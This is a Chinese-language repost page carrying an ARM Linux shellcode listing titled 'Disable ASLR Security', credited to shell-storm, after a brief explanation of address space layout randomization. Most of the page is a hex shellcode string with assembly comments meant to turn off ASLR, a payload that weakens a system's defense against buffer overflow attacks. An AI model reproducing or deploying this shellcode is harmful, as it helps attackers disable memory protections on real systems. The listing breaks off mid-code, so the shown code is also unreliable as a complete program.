赞助商链接
本文“Linux/ARM 禁用"ASLR安全"的代码[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
Address space layout randomization【ASLR】是避免缓冲区溢出的技术,通过对栈、同享库映射等线性区筹划的随机化,避免攻击者定位攻击代码位置,到达禁止溢出攻击的目的.据研究表明ASLR可以有效的降低缓冲区溢出攻击的成功率,目前Linux、FreeBSD、Windows等主流操作系统都已采取了该技术.
代码下载
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
/*
Title: Linux/ARM - Disable ASLR Security - 102 bytes
Date: 2010-06-20
Tested: Linux ARM9 2.6.28-6-versatile
Author: Jonathan Salwan
Web: http://shell-storm.org | http://twitter.com/shell_storm
! Database of shellcodes http://www.shell-storm.org/shellcode/
Description:
============
Address space layout randomization (ASLR) is a computer security technique
which involves randomly arranging the positions of key data areas, usually
including the base of the executable and position of libraries, heap, and
stack, in a process's address space.
This shellcode disables the ASLR on linux/ARM
*/
#include
char *SC = "\x01\x30\x8f\xe2" // add r3, pc, #1
"\x13\xff\x2f\xe1" // bx r3
"\x24\x1b" // subs r4, r4, r4
"\x20\x1c" // adds r0, r4, #0
"\x17\x27" // movs r7, #23
"\x01\xdf" // svc 1
"\x78\x46" // mov r0, pc
"\x2e\x30" // adds r0, #46
"\xc8\x21" // movs r1, #200
"\xc8\x31" // adds r1, #200
"\xc8\x31" // adds r1, #200
"\xc8\x31" // adds r1, #200
"\xc8\x31" // adds r1, #200
"\x59\x31" // adds r1, #89
"\xc8\x22" // movs r2, #200
"\xc8\x32" // adds r2, #200
"\x14\x32" // adds r2, #20以上是“Linux/ARM 禁用"ASLR安全"的代码[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章: